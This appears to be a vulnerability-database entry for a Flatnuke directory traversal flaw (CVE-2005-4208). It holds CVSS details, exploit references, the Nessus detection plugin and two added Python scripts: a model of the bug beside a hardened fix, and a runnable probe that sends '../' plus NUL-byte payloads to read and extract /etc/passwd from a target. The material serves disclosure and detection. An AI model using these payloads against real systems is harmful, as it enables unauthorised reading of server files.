CVE-2005-4208 - Directory Traversal vulnerability in Flatnuke 2.5.6

CVSS 5.0 - MEDIUM (CVSS2 vector AV:N/AC:L/Au:N/C:P/I:N/A:N)

Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: NONE
Availability impact: NONE

Tags: network, low complexity, flatnuke, nessus, exploit available

Summary

Directory traversal vulnerability in Flatnuke 2.5.6 allows remote attackers to access arbitrary files via a .. (dot dot) and null byte (%00) in the id parameter of the read module.
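The flaw described above is the classic flat-file CMS pattern: a request parameter is spliced into a file path, a fixed extension is appended, and a trailing NUL byte (%00) makes the PHP runtime of that era drop the extension before the open() call. The following Python model is an added example, not Flatnuke's own code: the install layout (`/srv/www/flatnuke/sections/read/<id>.txt`), the function names and the allow-list are assumptions chosen to illustrate the bug. It emulates the two PHP behaviours that matter here (NUL truncation in filesystem calls before PHP 5.3.4, and what `magic_quotes_gpc` did to the parameter), and places the vulnerable resolver beside a hardened one that rejects NUL, enforces an allow-list and proves the canonical path stays under the article directory.

```python
import os
import re

# Assumed install layout for this example (not taken from the Flatnuke source):
# articles are flat files under <doc_root>/sections/read/<id>.txt
DOC_ROOT = "/srv/www/flatnuke"
ARTICLE_DIR = os.path.join(DOC_ROOT, "sections", "read")


def php_nul_truncate(path: str) -> str:
    """Emulate PHP filesystem calls before 5.3.4: the path was handed to the C
    library as a C string, so everything after the first NUL byte (including
    the '.txt' suffix the script appended) never reached the kernel."""
    return path.split("\x00", 1)[0]


def php_addslashes(value: str) -> str:
    """Emulate what magic_quotes_gpc did to every request parameter: backslash,
    quotes and NUL get escaped, NUL becoming the two characters backslash-zero.
    That is why the Nessus plugin's workaround blocks this particular payload."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\x00", "\\0"))


def vulnerable_article_path(article_id: str) -> str:
    """Vulnerable pattern: the request's id is concatenated into a file path with
    no canonicalisation or allow-list. Returns the path the OS would open."""
    raw = os.path.join(ARTICLE_DIR, article_id + ".txt")
    return os.path.normpath(php_nul_truncate(raw))


# Hardened version: only identifiers of this shape are ever turned into paths.
ID_ALLOWLIST = re.compile(r"\A[A-Za-z0-9_-]{1,64}\Z")


def safe_article_path(article_id: str) -> str:
    """Hardened resolver: reject NUL and anything outside the allow-list, then
    canonicalise and verify the result still sits under ARTICLE_DIR."""
    if "\x00" in article_id:
        raise ValueError("NUL byte in article id")
    if not ID_ALLOWLIST.match(article_id):
        raise ValueError("article id contains characters outside the allow-list")
    base = os.path.realpath(ARTICLE_DIR)
    candidate = os.path.realpath(os.path.join(base, article_id + ".txt"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the article directory")
    return candidate


def is_rejected(article_id: str) -> bool:
    """True when the hardened resolver refuses the id."""
    try:
        safe_article_path(article_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # What id=..%2F..%2F...%2Fetc%2Fpasswd%00 decodes to on the server side.
    payload = "../../../../../../../../etc/passwd\x00"
    print("vulnerable :", vulnerable_article_path(payload))
    print("quoted     :", vulnerable_article_path(php_addslashes(payload)))
    print("hardened   :", "rejected" if is_rejected(payload) else "accepted")
```

Note that `magic_quotes_gpc` only neutralises the NUL byte; without the suffix-stripping trick the traversal still reaches any file that happens to end in the appended extension, and the setting was removed from PHP in 5.4, so the allow-list plus containment check is the fix that actually holds.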

Vulnerable Configurations

Part         Description   Count
Application  Flatnuke      1

Exploit-Db

  • Title: Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit
    Description: Flatnuke 2.5.6 Privilege Escalation / Remote Commands Execution Exploit. CVE-2005-4208, CVE-2005-4449. Webapps exploit for PHP platform
    ID: EDB-ID:1367
    Reporter: rgod
    Published: 2005-12-10
    Modified: 2005-12-10
    Last seen: 2016-01-31
    Source: https://www.exploit-db.com/download/1367/
  • Title: Flatnuke <= 2.5.5 - Remote Code Execution
    Description: Flatnuke <= 2.5.5 Remote Code Execution. CVE-2005-2540, CVE-2005-4208. Webapps exploit for PHP platform
    ID: EDB-ID:1140
    Reporter: rgod
    Published: 2005-08-08
    Modified: 2005-08-08
    Last seen: 2016-01-31
    Source: https://www.exploit-db.com/download/1140/

Nessus

NASL family: CGI abuses
NASL id: FLATNUKE_ID_DIR_TRAVERSAL.NASL
Title: FlatNuke index.php id Parameter Traversal Arbitrary File Access
Description: The remote host is running FlatNuke, a content management system written in PHP and using flat files rather than a database for its storage. The version of FlatNuke installed on the remote host fails to remove directory traversal sequences from user input to the 'id' parameter of the 'index.php' script. Provided PHP's 'magic_quotes_gpc' setting is disabled, an attacker can leverage this flaw to read arbitrary files on the remote host subject to the privileges of the web server user id.
Plugin id: 20293
Published: 2005-12-12
Modified: 2020-06-02
Last seen: 2020-06-01
Reporter: This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
Source: https://www.tenable.com/plugins/nessus/20293
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20293);
  script_version("1.24");
  script_cvs_date("Date: 2018/11/15 20:50:17");

  script_cve_id("CVE-2005-2813", "CVE-2005-4208");
  script_bugtraq_id(14702, 15796);

  script_name(english:"FlatNuke index.php id Parameter Traversal Arbitrary File Access");
  script_summary(english:"Checks for id parameter directory traversal vulnerability in FlatNuke");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
directory traversal vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running FlatNuke, a content management system
written in PHP and using flat files rather than a database for its
storage. 

The version of FlatNuke installed on the remote host fails to remove
directory traversal sequences from user input to the 'id' parameter of
the 'index.php' script.  Provided PHP's 'magic_quotes_gpc' setting is
disabled (so the trailing %00 is not escaped), an attacker can leverage
this flaw to read arbitrary files on the remote host subject to the
privileges of the web server user id." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Dec/107" );
  script_set_attribute(attribute:"solution", value:
"Enable PHP's 'magic_quotes_gpc' setting." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/12");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/30");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/flatnuke", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Try to exploit the flaw to read a file.
  file = "../../../../../../../../../../../../../etc/passwd";
  u = string(
      dir, "/?",
      "mod=read&",
      "id=", file, "%00"
    );
  r = http_send_recv3(port:port, method: "GET", item: u);
  if (isnull(r)) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string: r[2]))
  {
    output = strstr(r[2], 'read.png" alt="Read">&nbsp;');
    if (output) output = output - 'read.png" alt="Read">&nbsp;';
    if (output) output = output - strstr(output, '</font></td>');
    if (isnull(output)) output = r[2];
    output = data_protection::redact_etc_passwd(output:output);
    report = '\n';
    foreach line (split(output, keep: 0))
      report = strcat(report, clean_string(s: line), '\n');
    security_warning(port:port, extra: report);
    exit(0);
  }
}
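For anyone who needs to confirm the same condition without a Nessus install, the following Python script is an added example (not Tenable's plugin and not Flatnuke code) that reproduces the plugin's logic: it requests `?mod=read&id=<traversal>%00` under the application directory, greps the response for a root entry with the plugin's own pattern, and trims the leaked text between the 'Read' icon and the closing table cell the way the NASL does. The traversal depth, the default `/flatnuke` directory and the constructed sample response are assumptions made for the example; the pure functions can be exercised offline, and `probe()` only does network I/O when given a real base URL.

```python
import re
import sys
import urllib.error
import urllib.request
from typing import Optional

# Deep enough to climb out of any realistic install directory; the plugin uses
# the same idea with a fixed run of '../' segments.
TRAVERSAL = "../" * 13 + "etc/passwd"

# The same regular expression the Nessus plugin greps the body for.
ROOT_ENTRY = re.compile(r"root:.*:0:[01]:")

# Markers the plugin uses to cut the leaked file out of the rendered page.
READ_MARKER = 'read.png" alt="Read">&nbsp;'
CELL_END = "</font></td>"


def probe_path(app_dir: str) -> str:
    """Build the request path: read module, traversal id, URL-encoded NUL."""
    return f"{app_dir}/?mod=read&id={TRAVERSAL}%00"


def indicates_leak(body: str) -> bool:
    """True when the response contains what looks like /etc/passwd's root line."""
    return ROOT_ENTRY.search(body) is not None


def extract_leaked_text(body: str) -> str:
    """Mirror the plugin's trimming: text after the 'Read' icon, up to the
    closing cell; fall back to the whole body if the markers are absent."""
    start = body.find(READ_MARKER)
    if start == -1:
        return body
    leaked = body[start + len(READ_MARKER):]
    end = leaked.find(CELL_END)
    return leaked if end == -1 else leaked[:end]


def probe(base_url: str, app_dir: str = "/flatnuke", timeout: float = 10.0) -> Optional[str]:
    """Send the probe; return the leaked text on a hit, None otherwise."""
    url = base_url.rstrip("/") + probe_path(app_dir)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None
    return extract_leaked_text(body) if indicates_leak(body) else None


# Constructed sample of what a vulnerable page looks like (not a real capture):
# the file contents are rendered inside the article cell after the 'Read' icon.
SAMPLE_RESPONSE = (
    '<table><tr><td><img src="images/read.png" alt="Read">&nbsp;'
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "</font></td></tr></table>"
)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        # Offline demonstration against the constructed sample.
        print(extract_leaked_text(SAMPLE_RESPONSE) if indicates_leak(SAMPLE_RESPONSE) else "no leak")
    else:
        # Usage: python probe.py http://target.example [/app_dir]
        result = probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "/flatnuke")
        print(result if result is not None else "not vulnerable (or unreachable)")
```

The traversal sits in the query string rather than the URL path, so front-end normalisation of `../` in the path (which Apache and most reverse proxies perform) does not interfere with the test; the NUL is what makes the check specific to the unpatched, non-magic-quotes configuration, so a clean result here does not prove the traversal itself is gone.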